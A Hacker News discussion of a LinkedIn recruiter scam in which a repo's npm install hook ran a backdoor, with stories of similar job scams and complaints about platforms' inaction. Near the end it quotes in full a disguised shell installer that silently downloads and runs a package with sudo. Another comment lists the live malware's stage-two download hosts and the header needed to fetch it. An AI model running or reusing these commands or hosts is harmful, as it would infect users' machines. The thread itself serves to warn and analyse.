self.__VINEXT_RSC_CHUNKS__=self.__VINEXT_RSC_CHUNKS__||[];self.__VINEXT_RSC_CHUNKS__.push("2:I[\"aadde9aaef29\",[],\"default\",1]\n3:I[\"6e873226e03b\",[],\"Children\",1]\n5:I[\"bc2946a341c8\",[],\"LayoutSegmentProvider\",1]\n6:I[\"6e873226e03b\",[],\"Slot\",1]\n7:I[\"3506b3d116f7\",[],\"ErrorBoundary\",1]\n8:I[\"a9bbde40cf2d\",[],\"default\",1]\n9:I[\"3506b3d116f7\",[],\"NotFoundBoundary\",1]\na:\"$Sreact.suspense\"\n:HL[\"/assets/index-BLEkI_5r.css\",\"style\"]\n") class="_meta_ka9gd_33">1600 points by lwhsiao 4 days ago | 303 comments Rendered at 15:21:07 GMT+0000 (Coordinated Universal Time) with Cloudflare Workers.
> ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine.
> npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor.
> The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install.
Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.
We've had fake recruiters that claim to work for us running basically the same scam. These are great fake profiles: LinkedIn Premium, tons of relevant posts, etc... but they don't work for us, and we get angry messages from people saying our recruiter tried to scam them. No, they're not our recruiter despite showing up on our company page on LinkedIn. No number of reports could get them taken down.
I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn, but not all startups have that connection!
He got a huge package.
Everyone lived happily ever after.
(LinkedIn eventually locked and then deleted his account, https://awesomeatyourjob.com/1140-bringing-more-laughter-fun...)
I'd like people to understand that this is a form of corruption. We've normalized many like it. LI knows that the only way to force them to fix the issue is to go through a drawn-out legal process, save a spate of bad press (RIP 60 Minutes), so of course they won't.
AWS did this for us at the time but the 3 people in the company that used AWS services never got to go to these things. So I doubly don't get it.
1. praxeologically, all individuals act for personal gain, which is subjective in nature;
2. most private corporations don't have a well-defined governance (aside from the occasional constitution), specially ones that rely on gift/favor-based economies, such as seen in certain tribes. Governments tend to be an exception due their unique legal nature.
Bernie Madoff's case can best described as a Ponzi scheme, a form of massive fraud scheme.
In a sibling comment, I realized that "corruption" isn't a defined crime in most jurisdictions, aside from Brazil, for some reason, so it's kind of wrong of me to say that corruption is legally defined.
Still, my particular peeve here is the implication of immoral conduct without context on LinkedIn's own rules.
False. [0] If the bank teller demands a bribe to let you withdraw from your account, that's corruption, even though they aren't working for the government.
> Corruption is the dishonest, fraudulent, or criminal use of entrusted authority or power for personal gain or other unlawful or unethical benefits. Corruption occurs in politics, business, education, media, and other social and economic fields.
[0] https://www.law.cornell.edu/wex/corruption
I concede that, outside of formal law, one can describe certain deviations of official attributions of private corps.' agents as corruption.
Legally ‘corruption’ doesn’t exist, as in there is no single law saying ‘corruption is illegal’. (What is ‘corruption’ exactly?)
There are laws against bribery, which does generally only apply to the government, but in many locations applies to pseudo-government roles like notaries, apostiloes, lawyers, etc.
There are laws against embezzlement (a type of corruption), and those definitely apply to private individuals.
There are laws against insider trading, a type of corruption. Those generally only apply to businesses/private folks, not the government, with some exceptions.
Then there is the various kinds of fraud, blackmail, etc. Most people would consider them corruption too. Those apply to private individuals and government agents too.
And many more. It’s a smorgasbord.
Embezzlement is better typified under theft. Same goes for most of the others: fraud is fraud, blackmail is blackmail. They may acquire a "corrupt" character when they are done in direct exchange of personal material gains. There are discussions about whether insider trading should be illegal.
Generally speaking, corruption is primarily a crime against public administration because it involves the government, which (supposedly) represents the people. Private companies represent themselves, so they get to (more) trivially decide who is on the line or not.
[0] https://en.wikipedia.org/wiki/Passive_corruption
[1] https://en.wikipedia.org/wiki/Active_corruption
[2] https://www.merriam-webster.com/dictionary/corruption
[https://www.jusbrasil.com.br/topicos/10598684/artigo-317-do-...].
[https://www.britannica.com/topic/bribery]
https://www.theverge.com/news/771210/linkedin-recruiter-exec...
How would LinkedIn validate that your email domain belongs to the company you claim to work for?
They want me to upload a govt id and blink my eyes in a video to get unlocked.
They can go jump.
That it requires you to buy your buddy a drink says it all. They should have taken the general issue to their higher ups, fixed it for you and then bought you a drink. Or dinner, on LinkedIn's dime.
It isn't at all a neat solution, but you could maintain a list of users on LinkedIn that are authorised to speak for your company, linked prominently on your profile with a warning that anyone else claiming to work for the company is likely a scammer but LinkedIn offers no way for you to stop them claiming to be part of your company.
If that became a common pattern it could highlight how much of a scammer paradise LI can be and maybe they'd be more likely to do something about that particular vector.
The only way this could be abused is if the administrator accounts on LinkedIn itself get hacked and temporarily other email domains are added to the whitelist (or if an approved user themselves got hacked on LinkedIn [or their work email for that matter]). These are all the usual vulnerabilities in any system.
I understand that it would be too extreme to only allow users to claim they worked at a company if this verification is done, but maybe putting a warning if you get a message from a recruiter/someone that has not verified they work at their 'present' company could go a long way (instead of right now tucking away the verified logo quietly on their profile page).
I had the opposite problem: my company name was equivalent to the owner of an online casino. It took me a year to figure out that the enormous amount of spam I was getting about ‘guest post placement’, and people contacting me about deals was because Linkedin put me among the list of the casino employees. As I was Director of my company, I was the most valuable prey for business spam.
I fixed the problem by deleting my account, but now I’m in all the shittiest of spam lists for eternity. I don’t know how do they even harvest emails from Linkedin.
https://haveibeenpwned.com/Breach/LinkedIn
Reported them to LI and nothing was ever done about it. Eventually the accounts disappeared as I guess they were either shut down or repurposed.
I remember getting an office manager, working from Dubai (I think), for my one-person, basically nonexistent company, working from my living room, in New York.
She may still be there. I never bother checking into LI, except making an occasional post, every few months.
I assume you mean the LinkedIn legal dept. The problem there is that these companies are so big that a 'complaint' or 'cease & desist' to them would be like a mosquito bite, if that, & most likely get lost in the 10s of thousands of other complaints.
It's the same with FB & Insta, etc. One of my daughters had a FB acct taken over that she had accumulated quite a following (~100k plus) with her custom hand drawn artwork. It was impossible to get any acknowledgement of the issue let alone get a suitable solution. And, unfortunately these large companies do not care. Sometime makes you wonder if LinkedIn & the like are even worth it
Edit: typos
or linkedin
But you still end up with the code on your machine and risk it being ran.
Bigger issue is giant, inscrutible dependency trees.
In this example, if they tried to run the test suite or application, they'd have been in the same boat.
Afaik all or most languages have some way to run arbitrary code at install time but it seems node is the main one getting targeted. I think the bigger issue here is just people running untrusted things.
If pulling down your company repo and running `npm install` can lead to a compromise, something has went terribly wrong with your company's security setup.
All my current projects have all the code needed in the repo (unless impossible, and aside from a compiler which I guess could also be compromised)
Last I recall was a download of a windows scr (screensaver masquerading) file.
Linkedin is a new low, and I'm sure the platform doesn't really care (look, more jobs), just as ad network companies (Google, Meta) don't really care about scam ads.
It's the least surprising thing once you've put yourself out there, very strange watching people here think it's novel, I expect it by default at this point, a stranger handing you code needs to go into a vm, would you let them hand you some candy with a wink too?
Bold strategy cotton, let's see if it pays off.
never got serious ones before, the occasional, useless headhunters who are clearly not based in the same country, but these were different. They were big companies in Canada, ones I'd definitely heard of and even applied to in the past. They were direct, were recruiters for those companies themselves, and were plugged in, able to answer questions, and engaging.
they constantly sent job ads, but only via .pdf files. I even pushed back on one and said I don't open random pdfs, send me a link and they declined. Same recruiter hit me up for a similar role a month later, also via pdf.
Multiple other members of the IT org, esp. the security and infra teams, also reported similar, aggressive recruitment efforts with pdfs. This was around 2020-2021.
That's all you need to know they're criminals and frauds.
I hate how normalized it became for "HR" to require you having a LI page for a job. I don't think its as bad now but for a while it was essentially not possible to get a job without putting all your personal info on linkedin.
>they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time
At least in the U.S., everyone will cry government overreach and no one will fund it. In other countries, they should probably just ban U.S. platforms unless they're reachable and actually resolve these type of problems.
Try that and see your champagne exports be tarriffed with 100% in no time.
I wonder why such common sense laws don't exist and who is preventing them from being introduced and passed despite wide public support in general?
The problem with a phone number you suggest is that it will get spammed and abused with fraudulent imposters too (the complete and utter destruction of trust in phone calls and text messages should also be corrected by the government, but that's a different topic).
https://www.fbi.gov/investigate/cyber
Just install a Russian locale on your computer to prevent malicious programs even starting and get on with your day because it's the truth.
Snowden is a free man in 2026 despite the United States of America very much wanting to put him in jail.
Practically speaking, there is zero chance that the USA would extradite someone to Iran, even if they weren't currently at war with them. Whether they did anything about it would probably depend on exactly what the situation was - there's a big of difference between targeted IRGC or defence systems and ransomwaring an Iranian hospital or scamming random citizens.
Where they'd probably get you is if you tried to monetise it, and get stolen/extorted cryptocurrencies (or whatever) into your bank account. But that could easily fall under tax evasion laws rather than computer misuse ones, because they'd be a lot easier to prove in court.
https://www.wired.com/story/p4x-north-korea-internet-hacker-...
So hostile countries should be fair game for Americans who want a side-hustle. Plenty of Russian targets that could be profitable.
You won't hear back from them, though. But, at least for US citizens (and possibly for anyone?), this is as far as I know the closest thing there is to an "Internet 911".
You might. (I have.) They were able to get a wire sent to a fraudster reversed. (Not my wire.)
It's basically impossible to catch suspects because they are either smart enough to cover their tracks very well, or (more often) live in countries whose governments don't care about their citizens (even pay them for) scamming westerners.
And no, number spoofing isn't an excuse either. We literally solved the much harder problem of email spoofing already. There are, what, 3 carrier networks in all of US? And they cannot do with each other what DMARC did for the hundreds of thousands disjoint organizations that comprise the internet? Please.
Absolutely true, but droning their data centers might have some policy repercussions.
I have posted about this before. See here: https://news.ycombinator.com/item?id=35191971
We have that in Europe and the world has not fallen apart. On top of that, we don't have even close to the scale of problems with scammers that the US has. I won't deny we don't have scammers because we absolutely have them, but they are far from the scourge they are in the US.
> This is on par with being unable to open a bank account if the capability is matured.
The secret is... we have constitutionally protected rights. Unless you do not pay your bills, your phone line will not get disconnected. And same for bank accounts - every European has the right to a basic banking account, even if you are a target of foreign sanctions [1].
[1] https://www.tagesschau.de/ausland/europa/konto-eugh-usa-sank...
I wonder why that is? I dont give the numbers out. That's why. Whenever a store says "do you gave a number with us" I say I don't have a cell phone. If they can plainly see I do have a cellphone, I add, "for that."
The second part is shopping at stores that dont tie prices to your having given them a number.
I'd advise that you think long and hard about the consequences of the current system before saying the alternative is worse.
Wonder if they’re effective in going after reports. I’d still report to IC3/FBI/powers that be, too. Just in case someone somewhere has the resources to do something… perhaps a high hope
US was so angry about "unfair" tariffs why are they not angry about criminals stealing from Americans?
secondary is the effort asymmetry between spinning up one of these scams (near 0 effort) and catching/prosecuting these scams (big effort, astronomical cost)
406 MHz is pretty close [1]. If you have a radio that screams on that channel, chances are the nearest search-and-rescue operation will at least be notified.
[1] https://www.sarsat.noaa.gov/emergency-406-beacons/
911 is for emergencies. I don’t think the global 911 service would give any attention to a LinkedIn scam.
I presume more countries have this, not sure about the US though (CISA maybe? CERT/CC?). CERT is the overarching org that manages local agencies like this Dutch NCSC. Though I am not sure if and how easy it is, globally, to report incidents.
Well, that plus their 50 nuclear warheads and continued ICBM development, amongst other things.
$100 says OP is Claude
Whenever I see a typical Claude-tell in writing, my internal reading voice switches automatically from my internal monologue’s voice into Claude’s voice for the rest of the piece.
This is the part that really irks me: LinkedIn and Github know this is the end goal of many of the rampant supply chain attacks but they a) don't have a first class mechanism for reporting b) don't seem to be improving their systems or even warning people. I have been hit be this enough times that I follow along to get screenshots of the scammer. One might think with all the surveillance systems Microsoft/LinkedIn/Github/Google-Meet/Calendly have in place that a potential victim reporting it along with an actual picture of the scammer could get us somewhere.
Like the Facebook problem. They were never in more trouble with people and legislators than when they were spending mountains of gold trying to police content.
It’s much easier to shrug and say, “Sorry folks, it’s the internet. Good luck.”
Very true. I remember when I was job hunting fot 2 years post-graduation, that these time sinks started to take meaning away from life and induced cynicism and depression (to an extent).
It's easy to forget all that once you end up getting a job, but remember to always be human and show empathy if a person cold-reaches out to you.
Oh, Microsoft.
When my YT Premium elapsed 70% od ads YT decided to show me were deepfake investment scams (of terrible quality), and Google also didn't find them to violate any of their policy. The remaining 30% were strait up foreign state-level propaganda, those I didn't even bother to report.
All three either have security or stability issues, which seems to get worse, not better, as microsoft goes more into AI. Where is the AI productivity (10x by some accounts!) within the company going to?
Someone sends you a repo, says the install is broken, and asks you to take a look.
A lot of developers would run rpm install before thinking twice, especially if they were tired or looking for work.
https://www.reddit.com/r/openclaw/comments/1rlet0h/someone_t...
Remember to use protection when meeting random people, and putting their junk deep inside your computer!
The last few weeks tell us how bad this is especially with all the mini-shai hulud's running around.
it already has, you can configure intellij to run npm commands in a Docker container.
It's ok, the guy with glasses from the Daily Show said it's ok.
The other was for a DevEx crypto service. While I was very suspicious the code looked okay but the recruiter was strange and changed their profile to a different person eventually. I think this was a crypto stealing scam though since it required connecting to a wallet. I don't have any crypto though, so I might be okay for now. Although reinstalling my system clean would be the only sure way in theory...
But also online, once or twice I received these Leetcode style sites to register and do a few tests before we meet, which was weird for me and I just ignored it.
One of them later asked "Why I didn't have time to do it yet" and I told them I first meet people and check the fit before I do tests, like who the hell does that differently?
Hope it hasn't become a way more common thing.
It was the most bizarely long roundabout way to get me to isntall malware I had ever witnessed I couldnt fathom it was real, I mean they interviewed me for half an hour. Now you might think Im paranoid however it was obvious, their camera was off ( personal preference they said) and well I allowed it... only for other eventual straws to breal the camels back, and I realised "oh uh oh this is just 2 strangers trying to get me to install crap on my laptop for wealth extraction".
I was flumoxed tbh I couldnt believe it, as the approach had been very organic, through Linkedin Dms, just that eventaully I realised I had succumbed to "yes men" ( the only thing that would get passed my already strict job filters ironically) to allow myself into such a comprimising situation.
The only question I had is how did they do such a smooth complex manouver and then I realised... oh they just used AI to come up with the plan and implementation.
So when I finally received a similar offer on LinkedIn, I made them pay to me, twice XD
They sent me a GitHub repository and claimed they needed help deploying a token or something similar. The obvious goal was to get me to run their code while connected to a wallet with real funds.
I told them: sure, I can probably help, but my time costs money.
So I convinced them to pay me for a consultation. For half an hour, I explained how “amazing and simple” the process was, and how they could do it themselves. They claimed to be from the US, but on the call they had an extremely heavy Asian accent. I even recorded part of it on camera, because the whole situation was ridiculous.
Before they could get too furious, I told them I did not have more time and that they would need to book another call. So they paid me a second time.
Before the second call, i got myself absolutely new macbook was for fun testing it, basically a fresh Mac (i should have been using vm because it’s faster to restore but that time i wasn’t familiar with UTM and i got parallels which is scam itself), just to see how their scam worked.
The scam was classic npm install-style: get someone to run scripts from a Git repo and hope they are unaware of how much access that can give to their machine.
Honestly, two years ago, I also did not fully understand that simple ‘nom install’ could give attackers such deep access to your computer.
The more direct comparison would be whatever the equivalence of “npm install” is for a given language, and what it allows to run. Sounds like they’re making good progress to fix that, but it’s certainly more than a popularity issue.
Practically, most systems leave it off because many out-of-band user space script language package ecosystems stop working. =3
There are also adaptive application firewalls that are user friendly.
https://github.com/evilsocket/opensnitch
If root installs OS supported VM packages, than it would be pointless to complain the system runs as expected. As a sentient turnip, I probably wouldn't know for sure... =3
Indeed, all things nodejs are usually a dumpster fire at a hair salon, but the real point here was people always inherit whatever the previous cheapest labor built at that office. Also, usually people don't get to make architectural decisions for a long time. =3
Saw it in the soup of other job posting, went to apply, it took me to some other job portal, ok whatever, this is normal, filled out all the forms as one does, and then reached the end and the site told me they'd submitted my application, and here were some other jobs I could apply to with the same application. Useful, right?
Click any of them, or anywhere else on the page, and a full screen modal takeover comes up, demanding you pay $50/application.
I closed the tab, but watched the email they sent me from the first job app. It went nowhere. Eventually applied to the company directly, on their job portal, and when I got to a real recruiter later, they said they never received my first app. My guess is ladders never even sent it and wouldn't until I paid up
Best part was ladders continued to spam my email inbox with job application invitations, each one wanting the same $50, until I blocked the fastmail throw away
I also had a "recruiter" reach out to me about a "role I'd be a good fit in". Made the meeting, and immediately some red flags. Audio and video were about 2 seconds out of sync. Guy then proceeded to try and pitch me on a similar job board, with the same $50/application cost, only this one had a 10 weeks salary cost on placement as well
I told him I wasn't interested.
Maybe these are just more traditional scams or whatever, not the malware type the op is about, but they still piss me off
People who've been unemployed for a long time are often desperate enough to overlook serious red flags that would never catch someone with substantial savings or who's employed and looking to job hop.
Hoping he wasn't scammed.
In the end it fucks me because when I tell my dad "Oh they never ask for you password, so don't say it to nobody no matter what."
He "But when they asked us last year?!"
https://www.linkedin.com/company/blockchainaustraliasolution...
https://blog.denv.it/posts/i-was-likely-targeted-by-dprk-in-...
It was likely DPKR.
I spoke on the phone with "Singapore based recruiters" a couple of times who wanted my services as a consultant for "advanced applications for semiconductor devices."
Turns out they were just fishing for inside information on my employer's end customer's applications.
Just a thought, but no call to action from me.
Update: found a clone of the repo on github and got the payload, all you have to do is add a header `bearrtoken: logo`
It's obfuscated, I will feed it to qwen to see what can be gleaned.
I tried content-types, user-agent, but no luck. I'm not sure what the user-agent of `req` is, but the default `node-fetch/1.0` does make the response json. They are a 307, but the result is a png.
I presume the original payload may have contained information that the hackers want to keep from prying eyes. Esp. now that it landed on HN, it makes sense to take it offline and replace with an actual png to avoid people finding information in it that may harm their future hacks or so?
Without seeing the request code I initially assumed it would be `Authorization: Bearer logo` that did the trick.
I have it running locally, and i don't want to add credentials to the vm with the malware.
According to qwen:
It's cross platform
It has a bunch of persistence mechanisms.
It downloads another pack from pub-1fe39d600a4447ba895ef1c848d32e7e.r2.dev, Verified I got the secondary payload
This pack looks like a python 3.10 environment along with an executable called cupsd.
And downloads another js script from http://138.201.125.58:1224/client/99/77
That script then proceeds to download three python scripts that use the aforementioned python environment and do their business, qwen is having trouble de-obfuscating their urls and I am busy.
Also what is your go to OS?
Hm, when I think of it an old Raspberry Pi could be my go to for this, but always physically.
> I'm actually curios to know how do you people visit the link securely?
Disposable vm with a connection to tor. Then copied to a disposable vm with access only to one port on my llm server the one running llama.cpp.
> I guess a VM but could in theory something be resilient enough to misuse the Shared Clipboard or something to access your host machine?
When I am doing this kind of thing i have some rules.
Rule #1 Do not run the malware.
Rule #2 No copying from the analysis vm.
Given the malware is not run it's highly unlikely that any Xen vulnerabilities can be exploited or llama.cpp vulnerabilities for that matter.
Ideally I would not be using my own llm server but proxying the requests through another vm that contains temporary credentials to a llm provider. But I did not have the time to set that up.
> Also what is your go to OS?
Qubes OS
> Hm, when I think of it an old Raspberry Pi could be my go to for this, but always physically.
Physical isolation has it's own issues. If you don't airgap the device it could exploit other devices in your network, old residential routers are not exactly bulletproof especially from the lan side. Additionally, physical devices could be vulnerable to bios and UEFI firmware persistence mechanisms.
~50% of jobs listed on who is hiring every month require a LinkedIn profile to submit a job application.
In order to find a job, one must bend the knee to LinkedIn first and subjugate themselves to the political (all sides) propaganda on the feed.
Some of these will happily get on "interview" calls etc.
For some reason, most (but not all) of them have the same telltale signs of looking for someone to work on a web3/crypto gaming project.
Github is really slow when it comes to malicious repos. You'll probably get an email randomly six months from now when they finally see it.
https://kaveh.page/blog/job-interview-scam
i've had maybe 10-20 requests after that that i've just blanked ignored.
Yes, throwaway VPS for interview coding tasks should be the new norm.
Because there's a massive bot network operating on LinkedIn right now... and I'm tired of interacting with it every day.
This has nearly gotten me before, and I got lucky.
I even did a write up. It was one of the first reverse engineerings I've did. https://gist.github.com/Throvn/97fcb4981c1ff66725d4b2e408ba0...
The company that I currently work for is currently paying for a curation product to scan NPM for vulnerabilities, and to prevent access to typo-squatting packages and new, unverified packages. I suspect that my employer may get to the point of banning NPM entirely, though.
How anybody in their right mind still uses this tech stack is beyond me.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Remember to treat every size on the internet as an adversary, even if they weren't in the past.
And, I am reading this on HN right now. What a coincidence!
I read a lot about social engineering and how the human being is considered the weakest layer in the security chain but this is the first time I've came across this pattern. Eye opening indeed.
That sucks, but it seems to be par for the course, these days.
Sure, that might have been the one chance in a life time to easy big money. Or just a path to financial big troubles.
The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.
Often they are not malicious, just unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take home screening project and they are quite good at getting at engineers heads that "leetcode is outdated/they dont believe in it" and whatever they want you to hear.
They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it.
I am much wiser now that I work multiple salary jobs remotely I realize these 3 golden rules:
- Don't stay loyal to your employers.
- Don't stay honest to those don't value it.
- Don't stay complacent always innovate.
IMO you are either honest or you are not
Stay vigilant out there everyone.
I don't know. There's a plentiful supply of bad humans.
That's your first red flag right there.
Good man, knows what he is doing.
FWIW, I only run ai cli tools on a hostinger vps, never on my personal device. Also allows me to run YOLO mode across the board. If I am working on a web project, then I use preview develop deploys for testing, so I do not even have to work on my machine. Its very fun workflow for experimentation. Still trying to work the kinks to make it easier.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Come on, github...
They know there's a high degree of fraud and they don't do anything about it. They don't care.
I've gotten tricked into sending my resume and talking on the phone with legitimate looking recruiters from Google, Netflix, Meta, OpenAI, Anthropic, etc, but LinkedIn does nothing about it.
Linkedin has become a rotten cesspool of scammers and spammers, ripe for disruption.
They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents was as follows (with the malicious URL removed):
```
( brew install openvpn ) >/dev/null 2>&1 & ovpn_pid=$!; ( url="https://asshole.scammer.dev/openvpn-mac"; policyCategoryId="-1"; installerArgs="url=$url:departmentId=1765561620401102848:sourceInstall=silent:technicianId=7455681275330027520"; silentInstall="true"; waitForProcess(){ processName="$1"; fixedDelay="$2"; terminate="$3"; while pgrep -f "$processName" >/dev/null; do if [ "$terminate" = "true" ]; then pkill -f "$processName" true; return; fi; delay="${fixedDelay:-$((RANDOM % 50 + 10))}"; sleep "$delay"; done; }; checkForRosetta2(){ waitForProcess "/usr/sbin/softwareupdate"; IFS='.' read -r osvers_major osvers_minor <<< "$(/usr/bin/sw_vers -productVersion)"; if [ "$osvers_major" -ge 11 ]; then if ! sysctl -n machdep.cpu.brand_string | grep -q "Intel"; then pgrep oahd >/dev/null 2>&1 /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1; fi; fi; }; checkForRosetta2; DIRECTORY="/Users/Shared/InstallerWorkspace"; mkdir -p "$DIRECTORY"; configFile="$DIRECTORY/agentinstallconfig.properties"; { echo "policyId=$policyCategoryId"; echo "install_args=$installerArgs"; echo "Silent_Install=$silentInstall"; } > "$configFile"; baseName="$(basename "$url")"; downLoadFile="/Users/Shared/$baseName"; curl --silent --fail --location --url "$url" --output "$downLoadFile" >/dev/null 2>&1 && sudo installer -pkg "$downLoadFile" -target / >/dev/null 2>&1; t=$?; rm -f "$configFile" "$downLoadFile"; exit "$t" ) >/dev/null 2>&1 & so_pid=$!; wait "$ovpn_pid"; ovpn_rc=$?; wait "$so_pid"; so_rc=$?; [ "$ovpn_rc" -eq 0 ] && [ "$so_rc" -eq 0 ]
```
Yeah, no. Be careful out there.
By the way, here's the scammer's "company website": https://jtwllc.com/
Superficially looks legit until you start investigating the finer details.
I think we need a different kind of PSA if its still so new to people